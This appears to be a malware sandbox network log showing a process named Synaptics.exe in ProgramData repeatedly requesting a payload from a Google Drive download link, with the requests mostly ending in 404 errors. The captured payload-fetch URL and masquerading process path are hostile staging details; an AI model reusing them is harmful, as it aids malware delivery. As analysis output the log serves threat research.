                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7zuWiKJQTHXnttQDVbw_v_-VHjrZHZbUobR-BvkG9YNsHvi0SHjoe8RaitX84Ero2P
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GybVQ_S-ZNCktUf_OZ61mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:22 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:22 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="PiAP-5OZ2PLYR7AXi-Ncsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:22 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                42 | 192.168.2.7 | 59819 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DYM3VxkzIegGADNHt65zbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                43 | 192.168.2.7 | 59818 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:22 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7ygkEC0aDN4Nk81-Wf6EOAEAw3qrWlkwtwdP_iBVCuoLvebXpIEFSEhW3VCANaMT2TRkQiE1w
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-lJzX9Aocll-xsiSZ8BK1_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:22 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:22 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="aQ5CkBA8fB8xxkHtgvfVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:22 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                44 | 192.168.2.7 | 59821 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-buoqz6Cvmxtk05GJc6e6IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                45 | 192.168.2.7 | 59828 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Marp_DEBwbrpLR3aS0CSvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                46 | 192.168.2.7 | 59829 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MkTkVu39GnCUiF-tt0zmyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 59830 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:23 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5QOhT1Ox-1IHWQdpOEuqjpxKxca3vIU_qv37XMUzorx8_8ntkxU8Pik9yFn1VFGR5r
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VBMMo4tlhytV7m-JeknI8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:23 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:23 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="OlP9QmgJrcne_YYAt62m5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:23 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 59831 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:23 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6rzlygiI9AhK3gEbQ2zj7iCtVImLxGbukstL1rQ3AyVKcSX4MebzIUqYxmxxVcWGe1KIW1JmA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GS_ZIsRWBWht0cF8QZUp_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:23 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:23 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="-augCq12KlAGmWPeVN9IkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:23 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 59841 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RQmiKhUHANUbIL5QFcBcww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 59840 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k37eUgjq2yY-tgq1uhv7Fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 59844 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
